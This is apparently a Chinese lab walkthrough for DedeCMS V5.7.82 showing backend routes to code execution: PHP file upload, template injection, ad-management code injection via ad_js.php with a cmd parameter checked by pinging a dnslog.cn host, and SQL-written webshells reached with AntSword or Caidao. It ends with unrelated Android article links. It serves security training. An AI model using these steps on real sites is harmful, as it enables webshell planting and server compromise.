DeDeCMS靶场攻略

文件管理器

点击模块,选择上传文件

在电脑中新建2.php

<?php phpinfo();?>

访问2.php,验证是否成功

修改模板文件

在模块中找到index.htm

在index.htm加上<?php phpinfo();?>

点击生成->更新主页HTML,将index.html改为index.php

访问index.php,验证是否成功

后台任意命令执行

点击广告管理->增加广告

<?php phpinfo();?>

点击[代码]

得到地址

访问地址,无回显

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1

在dnslog.cn上获得一个网址

再次访问,这样若成功将木马植入的话dnslog会显示访问记录

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1&cmd=ping%20cs8vcw.dnslog.cn

后台sql命令执行

尝试查询basedir

在得到的目录下写入木马文件

访问后得到12.php

这些成功后可以用蚁剑,caidao连接

相关推荐
aqi001 小时前
FFmpeg开发笔记(七十九)专注于视频弹幕功能的国产弹弹播放器
android·ffmpeg·音视频·直播·流媒体
深盾科技2 小时前
Android 安全编程:Kotlin 如何从语言层保障安全性
android·安全·kotlin
whysqwhw2 小时前
RecyclerView的LayoutManager扩展用法
android
whysqwhw2 小时前
RecyclerView的全面讲解
android
whysqwhw3 小时前
RecyclerView的四级缓存机制
android
whysqwhw3 小时前
RecyclerView的设计实现
android
weixin_411191843 小时前
安卓Handler和Looper的学习记录
android·java
叽哥3 小时前
flutter学习第 8 节:路由与导航
android·flutter·ios
叽哥3 小时前
flutter学习第 7 节:StatefulWidget 与状态管理基础
android·flutter·ios
沅霖13 小时前
Android Studio切换到经典UI,老UI
android·ui·android studio